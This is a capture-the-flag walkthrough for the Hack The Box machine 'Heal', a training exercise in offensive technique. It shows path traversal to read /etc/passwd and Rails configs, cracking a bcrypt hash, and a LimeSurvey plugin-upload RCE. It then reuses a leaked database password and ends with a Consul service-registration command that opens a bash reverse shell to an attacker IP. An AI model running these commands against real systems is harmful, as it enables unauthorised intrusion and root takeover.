Enumeration
Nmap Scan
Copy ┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $nmap -F -Pn $ip -oN Nmap/fast-scan
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $nmap -p22,80 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 68:af:80:86:6e:61:7e:bf:0b:ea:10:52:d7:7a:94:3d (ECDSA)
|_ 256 52:f4:8d:f1:c7:85:b6:6f:c6:5f:b2:db:a6:17:68:ae (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://heal.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu) Summary
Copy * Open ports: 22 - 80
* UDP open ports: None
* Services: SSH - HTTP
* Important notes: OpenSSH 8.9p1 - nginx 1.18.0 - http://heal.htb/ hosts file
Copy ┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $sudo sh -c "echo '$ip heal.htb' >> /etc/hosts"
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $tail -n1 /etc/hosts
10.10.11.46 heal.htb HTTP
http://heal.htb looks like this:
First, I will collect all subdomains from active enumeration (fuzzing)
Next, I fuzz for files and directories under, but don't get anything, So I switch to crawling the app for URLs and endpoints
Copy ┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $katana -u http://heal.htb -jc -o heal.endpoints
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $cat heal.endpoints | grep api.heal.htb
http://api.heal.htb/download?filename=
http://api.heal.htb/exports
http://api.heal.htb/resume
http://api.heal.htb/logout
http://api.heal.htb/profile
http://api.heal.htb/signin
http://api.heal.htb/signup So, from these endpoints I can see heal.htb that it uses the API at api.heal.htb to do several functions (sign-up, exports, sign-in, resume)
From whatweb, I can know ruby on rails technology being used in api.heal.htb
Copy ┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/UnderPass]
└──╼ $ whatweb http://api.heal.htb
http://api.heal.htb [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.46], Title[Ruby on Rails 7.1.4], UncommonHeaders[x-content-type-options,x-permitted-cross-domain-policies,referrer-policy,x-request-id], X-Frame-Options[SAMEORIGIN], X-XSS-Protection[0], nginx[1.18.0] Now, I will interact with the app to see its functionalities
Create an email to sign in with
After clicking on sign-up, I get to this
At the bottom of the page, there is an export pdf function
Intercepting the request with burp, I see it renders input field and returns the file name of pdf
Then it requests to download the file to a different endpoint
Copy GET /download?filename=12b85d49e4b595b93ed4.pdf HTTP/1.1
Host: api.heal.htb
Accept: application/json, text/plain, */*
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjozfQ.CZbGMyPLgTWm9p2lPa9pGZ0vGQ0qKgr7RG4kj1tUSGc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Origin: http://heal.htb
Referer: http://heal.htb/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close So, I thought about trying to download a local file such as /etc/passwd , and succeeds :))
These are the users having /bin/bash shell
Copy ┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $cat passwd | grep '/bin/bash'
root:x:0:0:root:/root:/bin/bash
ralph:x:1000:1000:ralph:/home/ralph:/bin/bash
postgres:x:116:123:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
ron:x:1001:1001:,,,:/home/ron:/bin/bash Since, ruby is used in api.heal.htb, it's worth nothing to try to include config.ru as it's commonly used by ruby on rails
It gives us good path to start with: config/ and from this post, we can know the credentials file being used by ruby
In config/database.yml, I get the location of sqlite3 database, since it uses ruby
Looking at it, there are some secrets
Cracking with hashcat
Copy hashcat -m 3200 '$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG' /usr/share/wordlist/rockyou.txt
..snip..
$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG:147258369
Session..........: hashcat
Status...........: Cracked Under survey, there is a button that redirects to a new subdomain take-survery
I added this to my file and continued. Going to http://take-survey.heal.htb, I see this page with info that ralph@heal.htb is the administrator
There is an admin panel under /admin that needs credentials, So I will leave it now.
Going to Survey admin panel, I used the credentials to login as ralph from the email we saw before.
After login, I note the app version below 6.6.4
When I searched for this version, I found RCE POC
Download the exploit, modify the reverse shell with my IP and port, and modify and config.yml by adding compatibility version 6 as it's not there by default.
Copy ┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $git clone https://github.com/Y1LD1R1M-1337/Limesurvey-RCE.git
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal/Limesurvey-RCE]
└──╼ $ cat php-rev.php
..snip..
$ip = '10.10.16.2';
$port = 1337;
..snip..
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal/Limesurvey-RCE]
└──╼ $cat config.xml
..snip..
<compatibility>
<version>3.0</version>
<version>4.0</version>
<version>5.0</version>
<version>6.0</version> I did exploitation steps manually instead of running exploit.py
Upload the zip file and click install
Activate the module.
Receive a shell as www-data after navigating to http://take-survey.heal.htb/upload/plugins/Y1LD1R1M/php-rev.php
Copy ┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $sudo /opt/penelope/penelope.py -i tun0 1337
[+] Got reverse shell from 🐧 heal.htb~10.10.11.46 💀 - Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/heal.htb~10.10.11.46/heal.htb~10.10.11.46.log 📜
www-data@heal:/$ Lateral Movement
Copy www-data@heal:/var$ netstat -antp | grep 127.0.0.1 | grep -i LISTEN
tcp 0 0 127.0.0.1:3001 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8600 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8503 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8500 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8302 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8301 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8300 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN - On running linpeas.sh, I got interesting credentials from the config file. It's a credential for PostgreSQL instance.
Copy www-data@heal:/tmp$ nano /var/www/limesurvey/application/config/config.php
..snip..
return array(
'components' => array(
'db' => array(
'connectionString' => 'pgsql:host=localhost;port=5432;user=db_user;password=AdmiDi0_pA$$w0rd;dbname=survey;',
'emulatePrepare' => true,
'username' => 'db_user',
'password' => 'AdmiDi0_XXXXXXX',
'charset' => 'utf8',
'tablePrefix' => 'lime_', I tried the password for two users, It only worked for ron
Copy www-data@heal:/tmp$ su ron
Password: AdmiDi0_XXXXXXX
ron@heal:/tmp$
ron@heal:~$ cat user.txt
6532d7ea0abd75ce47e3exxxxxxxxxxx User Flag: 6532d7ea0abd75ce47e3exxxxxxxxxxx
Privilege Escalation
From the open ports inside the box, I will map them to my host to be able to attack it using port forwarding over SSH
Copy ┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Heal/Limesurvey-RCE]
└──╼ $sshpass -p 'AdmiDi0_XXXXXXX' ssh ron@heal.htb -L 8500:127.0.0.1:8500 http://localhost:8500/ui/server1/services
The version in the left corner is Consul v1.19.2. Looking for public exploit to this version, I found this https://www.exploit-db.com/exploits/51117
From this POC, I construct my command to do it manually and receive a shell
Copy curl -X PUT -d '{"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", "bash -i >& /dev/tcp/10.10.16.2/8443 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80}' http://127.0.0.1:8500/v1/agent/service/register
Copy root@heal:~# cat root.txt
70fa8cc16d180a0981f8xxxxxxxxxx Root Flag: 70fa8cc16d180a0981f8xxxxxxxxxx
